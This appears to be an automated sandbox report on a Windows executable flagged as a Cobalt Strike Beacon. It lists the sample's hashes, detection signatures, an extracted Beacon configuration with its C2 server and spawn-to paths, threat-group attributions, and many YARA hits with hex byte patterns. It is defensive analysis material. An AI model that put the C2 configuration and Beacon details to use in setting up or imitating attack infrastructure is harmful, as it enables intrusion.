Edit tour

Windows Analysis Report
Z9fvmHepQC.exe

Overview

General Information

Sample name:	Z9fvmHepQC.exe renamed because original name is a hash value
Original sample name:	aab7bbb7b70a920a79c2c32126bf96fc7fb967938e49f70eb316379203452f1a.exe
Analysis ID:	1582290
MD5:	1e53f1eafb546110a915ac383181aaa6
SHA1:	78b5bb994fb9e60883c01cd62375557686be3205
SHA256:	aab7bbb7b70a920a79c2c32126bf96fc7fb967938e49f70eb316379203452f1a
Tags:	exeuser-zhuzhu0009
Infos:

Detection

CobaltStrike

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected CobaltStrike

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Detected potential crypto function

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Z9fvmHepQC.exe (PID: 1720 cmdline: "C:\Users\user\Desktop\Z9fvmHepQC.exe" MD5: 1E53F1EAFB546110A915AC383181AAA6)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Cobalt Strike, CobaltStrike	Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.	APT 29 APT32 APT41 AQUATIC PANDA Anunak Cobalt Codoso CopyKittens DarkHydrus Earth Baxia FIN6 FIN7 Leviathan Mustang Panda Shell Crew Stone Panda TianWu UNC1878 UNC2452 Winnti Umbrella	http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems http://blog.nsfocus.net/murenshark http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa http://www.secureworks.com/research/threat-profiles/gold-drake	https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTP"], "Port": 80, "SleepTime": 5000, "MaxGetSize": 1048576, "Jitter": 0, "MaxDNS": "Not Found", "C2Server": "p0.ssl.qhimg.com.cdn.dnsv1.com,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books", "UserAgent": "Not Found", "HttpPostUri": "Not Found", "Malleable_C2_Instructions": "Not Found", "HttpGet_Metadata": "Not Found", "HttpPost_Metadata": "Not Found", "PipeName": "Not Found", "DNS_Idle": "Not Found", "DNS_Sleep": "Not Found", "SSH_Host": "Not Found", "SSH_Port": "Not Found", "SSH_Username": "Not Found", "SSH_Password_Plaintext": "Not Found", "SSH_Password_Pubkey": "Not Found", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Config": "Not Found", "Proxy_User": "Not Found", "Proxy_Password": "Not Found", "Proxy_Behavior": "Not Found", "Watermark": 391144938, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": "Not Found", "bProcInject_StartRWX": "Not Found", "bProcInject_UseRWX": "Not Found", "bProcInject_MinAllocSize": "Not Found", "ProcInject_PrependAppend_x86": "Not Found", "ProcInject_PrependAppend_x64": "Not Found", "ProcInject_Execute": "Not Found", "ProcInject_AllocationMethod": "Not Found", "bUsesCookies": "Not Found", "HostHeader": "Not Found"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.2009341237.00000215D77EE000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x4769:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2009488257.00000215D77EE000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x4769:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2009224813.00000215D77E5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2009224813.00000215D77E5000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0xd769:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2009341237.00000215D77FC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2008238134.00000215D7841000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x18278:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2008238134.00000215D7841000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x15b52:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x16e03:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2008238134.00000215D7841000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x16a33:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x15dd6:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x336e5:$a39: %s as %s\%s: %d 0x42500:$a41: beacon.x64.dll 0x348ee:$a46: %s (admin) 0x33845:$a48: %s%s: %s 0x33711:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x3373d:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x34937:$a51: Content-Length: %d
00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x200b1:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x4269b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1d98b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1ec3c:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x1e86c:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x1dc0f:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2d8f0:$a39: %s as %s\%s: %d 0x3cba2:$a41: beacon.x64.dll 0x2eb00:$a46: %s (admin) 0x2da50:$a48: %s%s: %s 0x2d91c:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2d948:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2eb49:$a51: Content-Length: %d
00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1a188:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3cf0b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x17a62:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x18d13:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x18943:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x17ce6:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2009315322.00000215D77ED000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x5769:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2cd60:$a39: %s as %s\%s: %d 0x3c012:$a41: beacon.x64.dll 0x2df70:$a46: %s (admin) 0x2cec0:$a48: %s%s: %s 0x2cd8c:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2cdb8:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2dfb9:$a51: Content-Length: %d
00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x195f8:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3c37b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x16ed2:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x18183:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen
00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2cd60:$a39: %s as %s\%s: %d 0x3c012:$a41: beacon.x64.dll 0x2df70:$a46: %s (admin) 0x2cec0:$a48: %s%s: %s 0x2cd8c:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2cdb8:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2dfb9:$a51: Content-Length: %d
00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x195f8:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3c37b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x16ed2:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x18183:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen
00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x57ee3:$a39: %s as %s\%s: %d 0x66cfe:$a41: beacon.x64.dll 0x590ec:$a46: %s (admin) 0x58043:$a48: %s%s: %s 0x57f0f:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x57f3b:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x59135:$a51: Content-Length: %d
00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x184ff:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00 0x448af:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x66e99:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x15dd9:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1708a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x42189:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x4343a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x16cba:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x4306a:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x1605d:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ... 0x4240d:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x336e5:$a39: %s as %s\%s: %d 0x42500:$a41: beacon.x64.dll 0x348ee:$a46: %s (admin) 0x33845:$a48: %s%s: %s 0x33711:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x3373d:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x34937:$a51: Content-Length: %d
00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x200b1:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x4269b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1d98b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1ec3c:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x1e86c:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x1dc0f:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2008352809.00000215D77DA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2008352809.00000215D77DA000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x18769:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x306e5:$a39: %s as %s\%s: %d 0x3f500:$a41: beacon.x64.dll 0x318ee:$a46: %s (admin) 0x30845:$a48: %s%s: %s 0x30711:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x3073d:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x31937:$a51: Content-Length: %d
00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1d0b1:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3f69b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1a98b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1bc3c:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x1b86c:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x1ac0f:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000002.3254928165.00000215D7940000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.3254928165.00000215D7940000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.3254928165.00000215D7940000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2e760:$a39: %s as %s\%s: %d 0x3da12:$a41: beacon.x64.dll 0x2f970:$a46: %s (admin) 0x2e8c0:$a48: %s%s: %s 0x2e78c:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2e7b8:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2f9b9:$a51: Content-Length: %d
00000000.00000002.3254928165.00000215D7940000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1a1f8:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000002.3254928165.00000215D7940000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x17ad2:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x18d83:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
